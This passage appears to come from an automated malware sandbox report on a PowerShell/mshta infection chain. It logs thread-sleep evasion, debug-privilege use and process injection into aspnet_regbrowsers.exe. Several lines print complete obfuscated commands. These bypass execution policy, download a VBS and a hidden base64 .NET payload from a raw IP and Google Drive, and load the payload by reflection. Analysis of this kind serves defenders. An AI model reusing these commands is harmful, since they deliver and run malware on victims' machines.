          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2212
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1512
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2399
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1611
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 685
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 671
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1458
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8291
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\brij5btb\brij5btb.dllJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jk3wn0wt\jk3wn0wt.dllJump to dropped file
          Source: C:\Windows\System32\mshta.exe TID: 3592Thread sleep time: -240000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3760Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3852Thread sleep time: -1844674407370954s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3728Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3780Thread sleep count: 5652 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3788Thread sleep count: 1557 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3832Thread sleep time: -120000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3836Thread sleep time: -1844674407370954s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3808Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4052Thread sleep count: 1645 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4052Thread sleep count: 918 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4088Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2124Thread sleep count: 1881 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2124Thread sleep count: 7975 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2908Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2576Thread sleep time: -16602069666338586s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2576Thread sleep time: -3000000s >= -30000sJump to behavior
          Source: C:\Windows\System32\mshta.exe TID: 3016Thread sleep time: -300000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1180Thread sleep count: 2212 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 724Thread sleep count: 1512 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 772Thread sleep time: -180000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3372Thread sleep time: -2767011611056431s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3168Thread sleep count: 2399 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2784Thread sleep count: 1611 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1260Thread sleep time: -120000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2824Thread sleep time: -2767011611056431s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3468Thread sleep count: 685 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3468Thread sleep count: 671 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3584Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3736Thread sleep count: 1458 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3736Thread sleep count: 8291 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3788Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3792Thread sleep time: -23980767295822402s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3792Thread sleep time: -2400000s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 3820Thread sleep time: -300000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeThread delayed: delay time: 60000
          Source: wscript.exe, 00000017.00000003.483393815.0000000000493000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: KZmcCKOAvmcizPN =
          Source: wscript.exe, 0000000B.00000003.450060433.00000000003B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: KZmcCKOAvmcizPNac
          Source: wscript.exe, 00000017.00000003.483733117.00000000004C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: KZmcCKOAvmcizPN
          Source: seemethebestthingswithgreatneedswithgo.vbs.5.drBinary or memory string: WchcAzdtonfikUG = "KZmcCKOAvmcizPN"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Yara detected Powershell download and execute
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4092, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3588, type: MEMORYSTR
          Bypasses PowerShell execution policy
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Injects a PE file into a foreign processes
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 value starts with: 4D5AJump to behavior
          Writes to foreign memory regions
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 401000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 415000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 41A000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 4A0000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 7EFDE008Jump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenTJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\brij5btb\brij5btb.cmdline"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs" Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7224.tmp" "c:\Users\user\AppData\Local\Temp\brij5btb\CSCD2DC83D8CE34483988FC31C99ACC1C8B.TMP"Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"Jump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jk3wn0wt\jk3wn0wt.cmdline"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs"
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB606.tmp" "c:\Users\user\AppData\Local\Temp\jk3wn0wt\CSCA3D842248D9345F9BBF58E745EE55AE.TMP"
